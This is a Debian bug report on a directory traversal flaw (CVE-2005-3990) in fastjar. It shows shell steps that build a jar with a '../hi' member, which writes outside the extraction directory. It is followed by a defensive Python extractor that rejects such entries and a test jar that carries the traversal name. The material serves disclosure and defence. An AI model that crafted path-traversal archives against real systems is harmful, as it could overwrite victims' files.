Bug#368397: fastjar: CVE-2005-3990: directory traversal vulnerability
Package: fastjar
Version: 1:4.1.0-4
Severity: normal
Tags: security
CVE-2005-3990: "Directory traversal vulnerability in FastJar 0.93 allows
remote attackers to overwrite arbitrary files via a .jar file containing
filenames with "../" sequences."
I can reproduce this with the following steps (modified from an earlier
SUN jar vulnerability report [1]):
$ mkdir /tmp/foo
$ echo hi > /tmp/hi
$ cd /tmp/foo
$ fastjar cvf foo.jar ../hi
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/MANIFEST.MF (in=56) (out=56) (stored 0%)
adding: ../hi (in=3) (out=5) (deflated -66%)
Total:
------
(in = 51) (out = 371) (deflated -627%)
$ rm ../hi
$ fastjar xvf foo.jar
created: META-INF/
extracted: META-INF/MANIFEST.MF
inflated: ../hi
$ cat ../hi
hi
Please mention the CVE in your changelog.
Thanks,
Alec
[1] http://www.securiteam.com/securitynews/5IP0C0AFGW.html
-- System Information:
Debian Release: testing/unstable
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/dash
Kernel: Linux 2.6.16-alec-laptop
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Versions of packages fastjar depends on:
ii libc6 2.3.6-9 GNU C Library: Shared libraries
ii zlib1g 1:1.2.3-11 compression library - runtime
fastjar recommends no packages.
-- no debconf information
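The check an extractor needs so that a member named "../hi" like the one above cannot land outside the destination directory, as an added example that is not part of this report or of fastjar: the entry name is normalised and refused if it is absolute or still contains "..", and the resolved target path is confirmed to stay under the destination. The jar it extracts is constructed in memory, mirroring the report's three entries.

```python
import io
import os
import posixpath
import tempfile
import zipfile

def is_safe_entry(name: str) -> bool:
    """True if an archive member name cannot escape the extraction directory."""
    normalized = name.replace("\\", "/")      # some extractors accept backslashes
    if normalized.startswith("/") or ":" in normalized.split("/")[0]:
        return False                          # absolute or drive-letter path
    return ".." not in posixpath.normpath(normalized).split("/")

def safe_extract(jar_bytes: bytes, dest: str):
    """Extract entries that stay under dest; return (extracted, rejected)."""
    dest_real = os.path.realpath(dest)
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            # Both the name and the resolved path must pass.
            if (not is_safe_entry(info.filename)
                    or os.path.commonpath([dest_real, target]) != dest_real):
                rejected.append(info.filename)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with open(target, "wb") as out:
                    out.write(zf.read(info))
            extracted.append(info.filename)
    return extracted, rejected

def build_sample_jar() -> bytes:
    """Constructed jar mirroring the report: manifest plus a '../hi' entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/", "")
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("../hi", "hi\n")          # writestr keeps the name verbatim
    return buf.getvalue()

def demo():
    """Extract into a scratch dir; return (extracted, rejected, escaped_to_parent)."""
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "foo")
        os.mkdir(dest)
        extracted, rejected = safe_extract(build_sample_jar(), dest)
        return extracted, rejected, os.path.exists(os.path.join(tmp, "hi"))
```

With the report's archive, demo() extracts only the two META-INF entries and rejects "../hi", so no file appears in the parent of the destination.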